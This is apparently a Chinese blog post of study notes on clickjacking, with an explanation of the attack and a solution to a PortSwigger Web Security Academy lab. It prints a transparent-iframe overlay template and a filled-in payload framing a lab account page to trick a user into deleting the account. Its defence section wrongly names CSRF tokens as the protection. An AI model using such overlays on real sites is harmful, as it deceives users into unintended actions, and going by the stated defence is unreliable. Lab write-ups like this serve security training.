PortSwigger-03-点击劫持

一:漏洞原理

1、什么是点解劫持

  • 点击劫持是一种基于界面的攻击,用户通过点击诱饵网站中的一些其他内容,被诱骗点击隐藏网站上的可操作内容。
  • 一个网络用户访问一个诱骗网站(也许这是一个由电子邮件提供的链接)并点击一个按钮来赢得奖品。在不知不觉中,他们被攻击者欺骗,按下了另一个隐藏按钮,这导致了另一个网站上的帐户付款。这是一个点击劫持攻击的例子。该技术依赖于合并一个不可见的、可操作的网页(或多个网页),其中包含一个按钮或隐藏链接,比如说,在iframe中。iframe覆盖在用户预期的诱饵网页内容之上。
    (此攻击与 CSRF攻击的不同之处在于,用户需要执行按钮单击等操作,而CSRF攻击依赖于在用户不知情或不输入的情况下伪造整个请求)
  • 示例:网络用户访问诱饵网站(也许这是电子邮件提供的链接)并点击按钮以赢得奖品。在不知不觉中,他们被攻击者欺骗按下了另一个隐藏按钮,这导致在另一个站点上支付了帐户费用。这是点击劫持攻击的一个示例。该技术依赖于合并一个不可见的、可作的网页(或多个页面),其中包含一个按钮或隐藏的链接,例如,在 iframe 中。iframe 覆盖在用户预期的诱饵网页内容之上。这种攻击与 CSRF 攻击的不同之处在于,用户需要执行诸如按钮单击之类的作,而 CSRF 攻击则依赖于在用户不知情或输入的情况下伪造整个请求。

2、防范攻击

  • 通常通过使用CSRF令牌来放置CSRF攻击:特定于会话的一次性使用数字或nonce。

3、构建基本的点击劫持实验

(1)点击劫持攻击使用CSS来创建和操作层。攻击者将目标网站合并覆盖在诱饵网站的iframe层

css 复制代码
<head>
    <style>
        #target_website {
            position:relative;
            width:128px;
            height:128px;
            opacity:0.00001;
            z-index:2;
            }
        #decoy_website {
            position:absolute;
            width:300px;
            height:400px;
            z-index:1;
            }
    </style>
</head>
...
<body>
    <div id="decoy_website">
    ...decoy web content here...
    </div>
    <iframe id="target_website" src="https://vulnerable-website.com">
    </iframe>
</body>

二:PortSwigger靶场

1、使用 CSRF 令牌保护进行基本点击劫持

(1)题目要求:制作html页面来构建账户页面并欺骗用户删除账户(制作一个相同的界面)

css 复制代码
<style>
    iframe {
        position:relative;
        width:$width_value;
        height: $height_value;
        opacity: $opacity;
        z-index: 2;
    }
    div {
        position:absolute;
        top:$top_value;
        left:$side_value;
        z-index: 1;
    }
</style>
<div>Test me</div>
<iframe src="YOUR-LAB-ID.web-security-academy.net/my-account"></iframe>
 
我的是:
<style>
iframe {
    position:relative;
    width:500px;
    height: 700px;
    opacity: 0.0001;
    z-index: 2;
}
div {
    position:absolute;
    top:500px;
    left:60px;
    z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://0a11000404d22a86c463666000e90017.web-security-academy.net/my-account"></iframe>

陆续更新中...

相关推荐
Sui_Network19 小时前
Sui Stack Messaging SDK:为 Web3 打造可编程通信
大数据·人工智能·科技·web3·去中心化·区块链
Keegan小钢21 小时前
AI+Web3实战营日志 #7 | 完成Core合约测试
web3·ai编程
央链知播1 天前
链改2.0总架构师何超秘书长重构“可信资产lPO与数链金融RWA”
金融·重构·web3·区块链·业界资讯
alex1003 天前
AP2协议与AI Agent经济:重塑金融生态与主权国家挑战
人工智能·金融·web3·去中心化·区块链·ai agent
alex1003 天前
【一天一个Web3概念】区块链中的双花问题:概念、案例与防范措施
web3·区块链·双花
央链知播3 天前
链改2.0+港促会,携手赋能 Web3引企赴港!
web3
清 晨3 天前
Facebook怎么高效采集数据?
web3·互联网·facebook·tiktok·instagram·指纹浏览器·clonbrowser
alex1004 天前
【一天一个Web3概念】Uniswap:去中心化金融(DeFi)的自动做市商革命
金融·web3·去中心化·区块链·defi·uniswap
全干engineer4 天前
web3实战项目 - hardhat框架
web3·hardhat
alex1004 天前
【一天一个Web3概念】深入解析Web3空投:类型、参与策略与安全指南
安全·web3·airdrop·空投